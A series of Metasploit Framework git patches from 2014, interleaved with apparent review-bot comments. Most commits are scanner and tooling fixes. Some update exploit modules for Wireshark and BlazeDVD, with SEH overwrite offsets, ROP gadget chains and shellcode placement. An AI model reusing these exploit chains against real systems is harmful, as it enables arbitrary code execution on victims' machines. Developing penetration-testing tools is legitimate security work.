It also extends Rex by adding the following methods: + # * Rex::Ui::Text::Table.to_dokuwiki + # * Rex::Ui::Text::Table.to_mediawiki + # * Rex:Text.prevent_xss + # + def initialize(framework, opts) + super + + # Extend Rex::Ui::Text::Table class so it can output wiki formats + add_dokuwiki_to_rex + add_mediawiki_to_rex + + # Add the console dispatcher + add_console_dispatcher(WikiCommandDispatcher) + end + + # + # The cleanup routine removes the methods added to Rex by the plugin + # initialization and then removes the console dispatcher + # + def cleanup + # Cleanup methods added to Rex::Ui::Text::Table + Rex::Ui::Text::Table.class_eval { undef :to_dokuwiki } + Rex::Ui::Text::Table.class_eval { undef :to_mediawiki } + # Deregister the console dispatcher + remove_console_dispatcher('Wiki') + end + + # + # Returns the plugin's name. + # + def name + "wiki" + end + + # + # This method returns a brief description of the plugin. It should be no + # more than 60 characters, but there are no hard limits. + # + def desc + "Adds output to wikitext" + end + + + # + # The following methods are added here to keep the initialize method + # readable + # + + + # + # Extends Rex tables to be able to create Dokuwiki tables + # + def add_dokuwiki_to_rex + Rex::Ui::Text::Table.class_eval do + def to_dokuwiki + str = prefix.dup + # Print the header if there is one. Use headeri to determine wiki paragraph level + if header + level = "=" * headeri + str << level + header + level + "\n" + end + # Add the column names to the top of the table + columns.each do |col| + str << "^ " + col.to_s + " " + end + str << "^\n" unless columns.count.eql? 0 + # Fill out the rest of the table with rows + rows.each do |row| + row.each do |val| + cell = val.to_s + cell = "#{cell}" if cell.include? "|" + str << "| " + cell + " " + end + str << "|\n" unless rows.count.eql? 
0 + end + return str + end + end + end + + # + # Extends Rex tables to be able to create Mediawiki tables + # + def add_mediawiki_to_rex + Rex::Ui::Text::Table.class_eval do + def to_mediawiki + str = prefix.dup + # Print the header if there is one. Use headeri to determine wiki + # headline level. Mediawiki does headlines a bit backwards so that + # the header level isn't limited. This results in the need to 'flip' + # the headline length to standardize it. + if header + if headeri <= 6 + level = "=" * (-headeri + 7) + str << "#{level} #{header} #{level}" + else + str << "#{header}" + end + str << "\n" + end + # Setup the table with some standard formatting options + str << "{|class=\"wikitable\"\n" + # Output formated column names as the first row + unless columns.count.eql? 0 + str << "!" + str << columns.join("!!") + str << "\n" + end + # Add the rows to the table + unless rows.count.eql? 0 + rows.each do |row| + str << "|-\n|" + # Try and prevent formatting tags from causing problems + bad = ['&','<','>','"',"'",'/'] + r = row.join("|| ") + r.each_char do |c| + if bad.include? c + str << Rex::Text.html_encode(c) + else + str << c + end + end + str << "\n" + end + end + # Finish up the table + str << "|}" + return str + end + end + end + +protected +end +end From b864c4619db26fc294b83676bddd0635325974a3 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Mon, 21 Apr 2014 18:04:14 +0200 Subject: [PATCH 133/853] msftidy - added info messages this commit adds info messages to msftidy to show some info, but stil exit with status 0 if there are not errors. --- tools/msftidy.rb | 17 ++++++++++++++--- 1 file changed, 14 insertions(+), 3 deletions(-) diff --git a/tools/msftidy.rb b/tools/msftidy.rb index b263d16f61..9c6f299c11 100755 --- a/tools/msftidy.rb +++ b/tools/msftidy.rb 
@@ -30,6 +30,10 @@ class String "\e[1;32;40m#{self}\e[0m" end + def cyan + "\e[1;36;40m#{self}\e[0m" + end + def ascii_only? self =~ Regexp.new('[\x00-\x08\x0b\x0c\x0e-\x19\x7f-\xff]', nil, 'n') ? false : true end @@ -83,6 +87,13 @@ class Msftidy puts "#{@full_filepath}#{line_msg} - [#{'FIXED'.green}] #{cleanup_text(txt)}" end + # + # Display an info message. Info messages do not alter the exit status. + # + def info(txt, line=0) + line_msg = (line>0) ? ":#{line}" : '' + puts "#{@full_filepath}#{line_msg} - [#{'INFO'.cyan}] #{cleanup_text(txt)}" + end ## # @@ -490,10 +501,10 @@ class Msftidy test.each { |item| case item[1] when 'cgi' - warn("Please use vars_get in send_request_cgi: #{item[0]}") + info("Please use vars_get in send_request_cgi: #{item[0]}") when 'raw' - # send_request_raw does not support vars_getiirb - warn("Please use vars_get and switch to send_request_cgi: #{item[0]}") + # send_request_raw does not support vars_get + info("Please use vars_get and switch to send_request_cgi: #{item[0]}") else raise('Error in regex') end From e25ca6464161b735f2dc699ded9f6dcad4ef3464 Mon Sep 17 00:00:00 2001 From: JoseMi Date: Mon, 21 Apr 2014 17:49:40 +0100 Subject: [PATCH 134/853] It's solved the crash when double-click on the pcap file --- .../windows/misc/wireshark_mpeg_overflow.rb | 31 +++++++++++++------ 1 file changed, 22 insertions(+), 9 deletions(-) diff --git a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb index 3002bfe3e7..934449dbb8 100644 --- a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb @@ -47,7 +47,8 @@ class Metasploit3 < Msf::Exploit::Remote [ [ 'WinXP SP3 Spanish (bypass DEP)', { - 'OffSet' => 70692, + 'OffSet' => 69732, + 'OffSet2' => 70476, 'Ret' => 0x1c077cc3, # pop/pop/ret -> "c:\Program Files\Wireshark\krb5_32.dll" (version: 1.6.3.16) 'jmpesp' => 0x68e2bfb9, } 
@@ -94,18 +95,30 @@ class Metasploit3 < Msf::Exploit::Remote def exploit print_status("Creating '#{datastore['FILENAME']}' file ...") - magic_header = "\xff\xfb\x41" # mpeg magic_number(MP3) -> http://en.wikipedia.org/wiki/MP3#File_structure - packet = rand_text_alpha(891) + ropchain = create_rop_chain + magic_header = "\xff\xfb\x41" # mpeg magic_number(MP3) -> http://en.wikipedia.org/wiki/MP3#File_structure + # Here we build the packet data + packet = rand_text_alpha(883) + packet << "\x6c\x7d\x37\x6c" # NOP RETN + packet << "\x6c\x7d\x37\x6c" # NOP RETN packet << ropchain - packet << payload.encoded # Shellcode + packet << payload.encoded # Shellcode packet << rand_text_alpha(target['OffSet'] - 892 - ropchain.length - payload.encoded.length) - # SEH pointers overwrite (nseh & seh) - packet << make_nops(4) # nseh - # \0xff is a badchar then we can't make a jump back with jmp $-2000 + + # 0xff is a badchar for this exploit then we can't make a jump back with jmp $-2000 # After nseh and seh we haven't space, then we have to jump to another location. - # 0x6b805955 : # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] ** | {PAGE_EXECUTE_REA - packet << "\x55\x59\x80\x6b" # seh -> ADD ESP,offset # RETN + + # When file is open with command line. This is NSEH/SEH overwrite + packet << make_nops(4) # nseh + packet << "\x6c\x2e\xe0\x68" # ADD ESP,93C # MOV EAX,EBX # POP EBX # POP ESI # POP EDI # POP EBP # RETN + + packet << rand_text_alpha(target['OffSet2'] - target['OffSet'] - 8) # junk + + # When file is open with GUI interface. This is NSEH/SEH overwrite + packet << make_nops(4) # nseh + packet << "\x55\x59\x80\x6b" # seh -> # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] ** + print_status("Preparing payload") filecontent = magic_header filecontent << packet From c56182a9781b70dc24880e2ba98e863447fb6c75 Mon Sep 17 00:00:00 2001 
From: Trenton Ivey Date: Mon, 21 Apr 2014 12:26:28 -0500 Subject: [PATCH 135/853] Removed an old comment about an added method. Data validation for each wiki type is attempted inline instead of through Rex --- plugins/wiki.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/plugins/wiki.rb b/plugins/wiki.rb index 9e8d31f5af..6128eb200d 100644 --- a/plugins/wiki.rb +++ b/plugins/wiki.rb @@ -440,7 +440,6 @@ class Plugin::Wiki < Msf::Plugin # dispatcher. It also extends Rex by adding the following methods: # * Rex::Ui::Text::Table.to_dokuwiki # * Rex::Ui::Text::Table.to_mediawiki - # * Rex:Text.prevent_xss # def initialize(framework, opts) super From 66b1c79da96277472e201e08b5eddf084d5d6895 Mon Sep 17 00:00:00 2001 From: Ken Smith Date: Mon, 21 Apr 2014 13:27:14 -0400 Subject: [PATCH 136/853] Update rop chain for versions 6.2 and 6.1 --- .../windows/fileformat/blazedvd_plf.rb | 47 ++++++++++--------- 1 file changed, 24 insertions(+), 23 deletions(-) diff --git a/modules/exploits/windows/fileformat/blazedvd_plf.rb b/modules/exploits/windows/fileformat/blazedvd_plf.rb index 665188f30f..b97afc1567 100644 --- a/modules/exploits/windows/fileformat/blazedvd_plf.rb +++ b/modules/exploits/windows/fileformat/blazedvd_plf.rb @@ -14,17 +14,17 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'BlazeDVD 6.1 PLF Buffer Overflow', 'Description' => %q{ - This module exploits a stack over flow in BlazeDVD 5.1 and 6.1. When + This module exploits a stack over flow in BlazeDVD 5.1 and 6.2. When the application is used to open a specially crafted plf file, a buffer is overwritten allowing for the execution of arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ - 'MC', - 'Deepak Rathore', - 'Spencer McIntyre', - 'Ken Smith' + 'MC', # Developed target 5.1 + 'Deepak Rathore', # ExploitDB PoC + 'Spencer McIntyre', # Developed taget 6.2 + 'Ken Smith' # Developed target 6.2 ], 'References' => [ 
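Review bot: The module metadata is left inconsistent by this hunk: the description and target are renamed to 6.2, but the unchanged `'Name' => 'BlazeDVD 6.1 PLF Buffer Overflow'` line still advertises 6.1, and the commit subject mentions both 6.2 and 6.1. Anyone matching this module against an installed version for triage or detection coverage cannot tell from the metadata which builds are covered, so the name and description should state the same version set. The new author comment `# Developed taget 6.2` also has a typo and should read `# Developed target 6.2`.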
@@ -46,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'BlazeDVD 6.1', + [ 'BlazeDVD 6.2', { 'Payload' => { 
@@ -78,31 +78,32 @@ class Metasploit3 < Msf::Exploit::Remote def rop_chain # rop chain generated with mona.py - www.corelan.be case target.name - when 'BlazeDVD 6.1' + when 'BlazeDVD 6.2' rop_gadgets = [ ] # 0x6162e802 RETN (ROP NOP) [EPG.dll] rop_gadgets.fill(0x6162e802, 0..7) rop_gadgets += [ - 0x6411437d, # POP EAX # RETN [NetReg.dll] + 0x61636758, # POP EAX # RETN [EPG.dll] 0x10011108, # ptr to &VirtualProtect() [IAT SkinScrollBar.Dll] - 0x6033d910, # MOV ESI,DWORD PTR DS:[EAX] # RETN [Configuration.dll] - 0x640402b3, # POP EBP # RETN [MediaPlayerCtrl.dll] - 0x60335935, # & PUSH ESP # RETN 0C [Configuration.dll] - 0x6032b8bb, # POP EAX # RETN [Configuration.dll] - 0xfffffcff, # Value to negate, will become 0x00000301 + 0x616306ed, # MOV EAX,DWORD PTR DS:[EAX] # RETN [EPG.dll] + 0x616385d8, # XCHG EAX,ESI # RETN 0x00 [EPG.dll] + 0x61628ea2, # POP EBP # RETN [EPG.dll] + 0x616069a1, # push esp # ret 0x04 [EPG.dll] + 0x61626702, # POP EAX # RETN [EPG.dll] + 0xfffffdff, # Value to negate, will become 0x00000201 0x61627d9c, # NEG EAX # RETN [EPG.dll] 0x61640124, # XCHG EAX,EBX # RETN [EPG.dll] - 0x6403bb48, # POP EAX # RETN [MediaPlayerCtrl.dll] + 0x61629938, # POP EAX # RETN [EPG.dll] 0xffffffc0, # Value to negate, will become 0x00000040 - 0x6403a1b7, # NEG EAX # RETN [MediaPlayerCtrl.dll] - 0x64046c72, # XCHG EAX,EDX # RETN [MediaPlayerCtrl.dll] - 0x6403c973, # POP ECX # RETN [MediaPlayerCtrl.dll] - 0x1001514c, # &Writable location [SkinScrollBar.Dll] - 0x6403a94d, # POP EDI # RETN [MediaPlayerCtrl.dll] - 0x6162e802, # RETN (ROP NOP) [EPG.dll] - 0x64106f33, # POP EAX # RETN [NetReg.dll] + 0x61627d9c, # NEG EAX # RETN [EPG.dll] + 0x61608ba2, # XCHG EAX,EDX # RETN [EPG.dll] + 0x61612f5a, # POP ECX # RETN [EPG.dll] + 0x100142ab, # &Writable location [SkinScrollBar.Dll] + 0x616313ac, # POP EDI # RETN [EPG.dll] + 0x6162e588, # RETN (ROP NOP) [EPG.dll] + 0x6162d638, # POP EAX # RETN [EPG.dll] 0x90909090, # nop - 0x6031d582, # PUSHAD # RETN [Configuration.dll] + 
0x61620831, # PUSHAD # RETN [EPG.dll] ] end return rop_gadgets.flatten.pack("V*") @@ -115,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote plf[868,8] = Rex::Arch::X86.jmp_short(6) + rand_text_alpha_upper(2) + [target.ret].pack('V') plf[876,12] = make_nops(12) plf[888,payload.encoded.length] = payload.encoded - when 'BlazeDVD 6.1' + when 'BlazeDVD 6.2' plf = rand_text_alphanumeric(260) plf << rop_chain plf << payload.encoded From fbe392a896d26940bfa9d81430bf83faacaa06bb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Wies=C5=82aw=20Kielas?= Date: Mon, 21 Apr 2014 23:27:40 +0200 Subject: [PATCH 137/853] Add PostgreSQL TLS support to the Heartbleed scanner --- .../scanner/ssl/openssl_heartbleed.rb | 19 ++++++++++++++++--- 1 file changed, 16 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb index 478ac0e3e6..bee8d53b86 100644 --- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb +++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb @@ -80,7 +80,8 @@ class Metasploit3 < Msf::Auxiliary 'IMAP' => :tls_imap, 'JABBER' => :tls_jabber, 'POP3' => :tls_pop3, - 'FTP' => :tls_ftp + 'FTP' => :tls_ftp, + 'POSTGRES' => :tls_postgres } # See the discussion at https://github.com/rapid7/metasploit-framework/pull/3252 @@ -111,7 +112,8 @@ class Metasploit3 < Msf::Auxiliary 'Sebastiano Di Paola', # Msf module 'Tom Sellers', # Msf module 'jjarmoc', #Msf module; keydump, refactoring.. - 'Ben Buchanan' #Msf module + 'Ben Buchanan', #Msf module + 'herself' #Msf module ], 'References' => [ 
@@ -137,7 +139,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ Opt::RPORT(443), - OptEnum.new('TLS_CALLBACK', [true, 'Protocol to use, "None" to use raw TLS sockets', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3', 'FTP' ]]), + OptEnum.new('TLS_CALLBACK', [true, 'Protocol to use, "None" to use raw TLS sockets', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3', 'FTP', 'POSTGRES' ]]), OptEnum.new('TLS_VERSION', [true, 'TLS/SSL version to use', '1.0', ['SSLv3','1.0', '1.1', '1.2']]), OptInt.new('MAX_KEYTRIES', [true, 'Max tries to dump key', 10]), OptInt.new('STATUS_EVERY', [true, 'How many retries until status', 5]), @@ -222,6 +224,17 @@ class Metasploit3 < Msf::Auxiliary sock.get_once(-1, response_timeout) end + def tls_postgres + # http://www.postgresql.org/docs/9.3/static/protocol-message-formats.html + sock.get_once + sock.put("\x00\x00\x00\x08\x04\xD2\x16\x2F") + res = sock.get_once + unless res && res =~ /S/ + return nil + end + res + end + def tls_pop3 # http://tools.ietf.org/html/rfc2595 sock.get_once(-1, response_timeout) From f35314b9f005d9b73ab024a5063ae11f486aa884 Mon Sep 17 00:00:00 2001 From: "Rick Farina (Zero_Chaos)" Date: Mon, 21 Apr 2014 21:56:56 -0400 Subject: [PATCH 138/853] adjust Msf::Util::EXE for newer file output Newer releases of File have a much different output when given a jar file. Adjust regex per egyp7's suggestion to close bug 8792 on redmine. Failure/Error: verify_bin_fingerprint(format_hash, bin) expected: /zip/i got: "/dev/stdin: Java archive data (JAR)\n" (using =~) Tested and confirmed working with file 5.17 on Gentoo Linux. --- spec/support/shared/contexts/msf/util/exe.rb | 26 ++++++++++---------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/spec/support/shared/contexts/msf/util/exe.rb b/spec/support/shared/contexts/msf/util/exe.rb index e1372a6492..c1b6ea5a92 100644 --- a/spec/support/shared/contexts/msf/util/exe.rb +++ b/spec/support/shared/contexts/msf/util/exe.rb 
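Review bot: In the new `tls_postgres` callback, `res =~ /S/` accepts any reply that contains an `S` anywhere, so a server that answers the SSLRequest with an error message instead of the single byte `S` would still be treated as ready for TLS; an exact comparison such as `return nil unless res == 'S'` avoids that. Both `sock.get_once` calls also omit the timeout that the neighbouring `tls_pop3` passes as `sock.get_once(-1, response_timeout)`. PostgreSQL presumably sends nothing before the client speaks, so the first read likely only waits out the default timeout and could be dropped. The later hunk that rebuilds the SSLRequest with `pack` leaves both of these lines unchanged.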
@@ -36,8 +36,8 @@ shared_context 'Msf::Util::Exe' do { :format => "psh", :arch => "x86_64", :file_fp => /ASCII/ }, { :format => "psh-net", :arch => "x86", :file_fp => /ASCII/ }, { :format => "psh-net", :arch => "x86_64", :file_fp => /ASCII/ }, - { :format => "war", :arch => "x86", :file_fp => /zip/i }, - { :format => "war", :arch => "x86_64", :file_fp => /zip/i }, + { :format => "war", :arch => "x86", :file_fp => /zip|jar/i }, + { :format => "war", :arch => "x86_64", :file_fp => /zip|jar/i }, { :format => "msi", :arch => "x86", :file_fp => /(Composite Document)|(CDF V2 Document)/ }, { :format => "msi", :arch => "x64", :file_fp => /(Composite Document)|(CDF V2 Document)/ }, { :format => "msi", :arch => "x86_64", :file_fp => /(Composite Document)|(CDF V2 Document)/ }, 
@@ -51,29 +51,29 @@ shared_context 'Msf::Util::Exe' do { :format => "elf", :arch => "armle", :file_fp => /ELF 32.*ARM/ }, { :format => "elf", :arch => "mipsbe", :file_fp => /ELF 32-bit MSB executable, MIPS/ }, { :format => "elf", :arch => "mipsle", :file_fp => /ELF 32-bit LSB executable, MIPS/ }, - { :format => "war", :arch => "x86", :file_fp => /zip/i }, - { :format => "war", :arch => "x64", :file_fp => /zip/i }, - { :format => "war", :arch => "armle", :file_fp => /zip/i }, - { :format => "war", :arch => "mipsbe", :file_fp => /zip/i }, - { :format => "war", :arch => "mipsle", :file_fp => /zip/i }, + { :format => "war", :arch => "x86", :file_fp => /zip|jar/i }, + { :format => "war", :arch => "x64", :file_fp => /zip|jar/i }, + { :format => "war", :arch => "armle", :file_fp => /zip|jar/i }, + { :format => "war", :arch => "mipsbe", :file_fp => /zip|jar/i }, + { :format => "war", :arch => "mipsle", :file_fp => /zip|jar/i }, ], "bsd" => [ { :format => "elf", :arch => "x86", :file_fp => /ELF 32.*BSD/ }, - { :format => "war", :arch => "x86", :file_fp => /zip/i }, + { :format => "war", :arch => "x86", :file_fp => /zip|jar/i }, ], "solaris" => [ { :format => "elf", :arch => "x86", :file_fp => /ELF 32/ }, - { :format => "war", :arch => "x86", :file_fp => /zip/i }, + { :format => "war", :arch => "x86", :file_fp => /zip|jar/i }, ], "osx" => [ { :format => "macho", :arch => "x86", :file_fp => /Mach-O.*i386/ }, { :format => "macho", :arch => "x64", :file_fp => /Mach-O 64/ }, { :format => "macho", :arch => "armle", :file_fp => /Mach-O.*(acorn|arm)/ }, { :format => "macho", :arch => "ppc", :file_fp => /Mach-O.*ppc/ }, - { :format => "war", :arch => "x86", :file_fp => /zip/i }, - { :format => "war", :arch => "x64", :file_fp => /zip/i }, - { :format => "war", :arch => "armle", :file_fp => /zip/i }, - { :format => "war", :arch => "ppc", :file_fp => /zip/i }, + { :format => "war", :arch => "x86", :file_fp => /zip|jar/i }, + { :format => "war", :arch => "x64", :file_fp => /zip|jar/i }, 
+ { :format => "war", :arch => "armle", :file_fp => /zip|jar/i }, + { :format => "war", :arch => "ppc", :file_fp => /zip|jar/i }, ], } From 8f6567967db18edbd13584b165c4b058c0c38ff8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Wies=C5=82aw=20Kielas?= Date: Tue, 22 Apr 2014 17:36:06 +0200 Subject: [PATCH 139/853] Heartbleed PostgreSQL TLS support improvements --- modules/auxiliary/scanner/ssl/openssl_heartbleed.rb | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb index bee8d53b86..3cca563d4b 100644 --- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb +++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb @@ -225,9 +225,14 @@ class Metasploit3 < Msf::Auxiliary end def tls_postgres + # postgresql TLS - works with all modern pgsql versions - 8.0 - 9.3 # http://www.postgresql.org/docs/9.3/static/protocol-message-formats.html sock.get_once - sock.put("\x00\x00\x00\x08\x04\xD2\x16\x2F") + # the postgres SSLRequest packet is a int32(8) followed by a int16(1234), + # int16(5679) in network format + psql_sslrequest = [8].pack('N') + psql_sslrequest << [1234, 5679].pack('n*') + sock.put(psql_sslrequest) res = sock.get_once unless res && res =~ /S/ return nil From 3f4e9ab18d13a7a079cd75c6e5eeaa6cbb6a2a27 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Tue, 22 Apr 2014 19:24:06 +0200 Subject: [PATCH 140/853] msftidy: only check send_request_cgi for vars_get --- tools/msftidy.rb | 12 ++---------- 1 file changed, 2 insertions(+), 10 deletions(-) diff --git a/tools/msftidy.rb b/tools/msftidy.rb index 9c6f299c11..ae7072ff77 100755 --- a/tools/msftidy.rb +++ b/tools/msftidy.rb 
@@ -496,18 +496,10 @@ class Msftidy end def check_vars_get - test = @source.scan(/(send_request_(cgi|raw)\s*\(\s*\{?\s*['"]uri['"]\s*=>\s*[^=})]*?\?[^,})]+)/im) + test = @source.scan(/send_request_cgi\s*\(\s*\{?\s*['"]uri['"]\s*=>\s*[^=})]*?\?[^,})]+/im) unless test.empty? test.each { |item| - case item[1] - when 'cgi' - info("Please use vars_get in send_request_cgi: #{item[0]}") - when 'raw' - # send_request_raw does not support vars_get - info("Please use vars_get and switch to send_request_cgi: #{item[0]}") - else - raise('Error in regex') - end + info("Please use vars_get in send_request_cgi: #{item}") } end end From d2a558dc85cd1ac4af87f9a12ca2c118e21f0edf Mon Sep 17 00:00:00 2001 From: kenkeiras Date: Tue, 22 Apr 2014 22:14:57 +0200 Subject: [PATCH 141/853] Removed unused code --- modules/auxiliary/scanner/ssh/ssh_enumusers.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index 306b98b707..09e625e9f6 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -152,11 +152,9 @@ class Metasploit3 < Msf::Auxiliary when :success print_good "User '#{user}' found on #{ip}" do_report(ip, user, rport) - :next_user when :connection_error print_error "User '#{user}' on #{ip} could not connect" - :abort when :fail print_debug "User '#{user}' not found on #{ip}" From c9d8da991aa4f0aaa3dee264b344961bf8a46c81 Mon Sep 17 00:00:00 2001 From: kenkeiras Date: Tue, 22 Apr 2014 22:16:16 +0200 Subject: [PATCH 142/853] Use Rex.sleep instead of select --- modules/auxiliary/scanner/ssh/ssh_enumusers.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index 09e625e9f6..25c3ce0dca 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb 
@@ -136,7 +136,7 @@ class Metasploit3 < Msf::Auxiliary while attempt_num <= retry_num and (ret.nil? or ret == :connection_error) if attempt_num > 0 - select(nil, nil, nil, 2**attempt_num) + Rex.sleep(2 ** attempt_num) print_debug "Retrying '#{user}' on '#{ip}' due to connection error" end From 96f042110f15941ccace98e1b22569e1ae81c59f Mon Sep 17 00:00:00 2001 From: kenkeiras Date: Tue, 22 Apr 2014 22:18:50 +0200 Subject: [PATCH 143/853] return is not needed when it's the last lifunction line --- modules/auxiliary/scanner/ssh/ssh_enumusers.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index 25c3ce0dca..e5ff043108 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -106,9 +106,9 @@ class Metasploit3 < Msf::Auxiliary finish_time = Time.new if finish_time - start_time > threshold - return :success + :success else - return :fail + :fail end end @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Auxiliary def user_list - return File.new(datastore['USER_FILE']).read.split + File.new(datastore['USER_FILE']).read.split end @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary ret = check_user(ip, user, rport) attempt_num += 1 end - return ret + ret end From 4d9ece2f9a800227661d0ce3a962be254dbfb294 Mon Sep 17 00:00:00 2001 From: Jonathan Claudius Date: Tue, 22 Apr 2014 21:34:08 -0400 Subject: [PATCH 144/853] Add hyphens and digits to group regex --- modules/auxiliary/scanner/http/cisco_ssl_vpn.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb index 9a0507fc91..a04dac6047 100644 --- a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb +++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb 
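Review bot: `user_list` still reads the wordlist with `File.new(datastore['USER_FILE']).read.split`, which opens a handle that is never closed; since this hunk already rewrites the line, `File.read(datastore['USER_FILE']).split` does the same work without leaking a descriptor. Whether `USER_FILE` is validated before this point is not visible in the hunk. If it is not, an unset option would surface here as a `TypeError` rather than a readable message.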
@@ -104,7 +104,7 @@ class Metasploit3 < Msf::Auxiliary match = res.body.match(group_name_regex) group_string = match[1] - groups = group_string.scan(/'(\w+)'/).flatten.to_set + groups = group_string.scan(/'([\w\-0-9]+)'/).flatten.to_set end return groups From 3d793fc6f1f57824b9b3fb62c55b45e3a53fe409 Mon Sep 17 00:00:00 2001 From: Jonathan Claudius Date: Tue, 22 Apr 2014 21:45:04 -0400 Subject: [PATCH 145/853] Add default VPN group fall back --- modules/auxiliary/scanner/http/cisco_ssl_vpn.rb | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb index a04dac6047..3d13dba438 100644 --- a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb +++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb @@ -54,7 +54,15 @@ class Metasploit3 < Msf::Auxiliary if datastore['GROUP'].empty? print_status("#{peer} - Attempt to Enumerate VPN Groups...") groups = enumerate_vpn_groups - print_good("#{peer} - Enumerated VPN Groups: #{groups.to_a.join(", ")}") unless groups.empty? + + if groups.empty? + print_good("#{peer} - Unable to enumerate groups") + print_good("#{peer} - Using the default group: DefaultWEBVPNGroup") + groups << "DefaultWEBVPNGroup" + else + print_good("#{peer} - Enumerated VPN Groups: #{groups.to_a.join(", ")}") + end + else groups << datastore['GROUP'] end From f71ad111dabcf347e5ce770b72c617233b0f44cb Mon Sep 17 00:00:00 2001 From: Jonathan Claudius Date: Tue, 22 Apr 2014 21:48:16 -0400 Subject: [PATCH 146/853] Change return values from nil to false --- modules/auxiliary/scanner/http/cisco_ssl_vpn.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb index 3d13dba438..95d59cca40 100644 --- a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb +++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb 
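Review bot: The character class in `group_string.scan(/'([\w\-0-9]+)'/)` lists `0-9` although `\w` already covers digits, so the only effective change is the hyphen; `/'([\w-]+)'/` says the same thing more plainly. Group names containing other characters, such as spaces or dots, are still skipped without any message, which deserves a comment if it is intended. The enclosing method starts outside the hunk.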
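Review bot: The fallback branch reports `Unable to enumerate groups` through `print_good`, which marks a failed step as a success in the console output and in any log built from it. `print_error("#{peer} - Unable to enumerate groups")` fits the first message, and `print_status` fits the line announcing the default group, since that line is informational rather than a finding. The enclosing `run_host` body continues outside the hunk.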
@@ -40,12 +40,12 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless check_conn? print_error("#{peer} - Connection failed, Aborting...") - return + return false end unless is_app_ssl_vpn? print_error("#{peer} - Application does not appear to be Cisco SSL VPN. Module will not continue.") - return + return false end print_good("#{peer} - Application appears to be Cisco SSL VPN. Module will continue.") From b3cabaaa28f3f12316a08d9a5a75e473f61708f0 Mon Sep 17 00:00:00 2001 From: Jonathan Claudius Date: Tue, 22 Apr 2014 21:58:14 -0400 Subject: [PATCH 147/853] Clean up some formatting concerns --- .../auxiliary/scanner/http/cisco_ssl_vpn.rb | 74 ++++++++++--------- 1 file changed, 39 insertions(+), 35 deletions(-) diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb index 95d59cca40..87cd705d49 100644 --- a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb +++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb @@ -79,30 +79,30 @@ class Metasploit3 < Msf::Auxiliary # Verify whether the connection is working or not def check_conn? begin - res = send_request_cgi( - { - 'uri' => '/', - 'method' => 'GET' - }) + res = send_request_cgi('uri' => '/', 'method' => 'GET') print_good("#{peer} - Server is responsive...") - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE + rescue ::Rex::ConnectionRefused, + 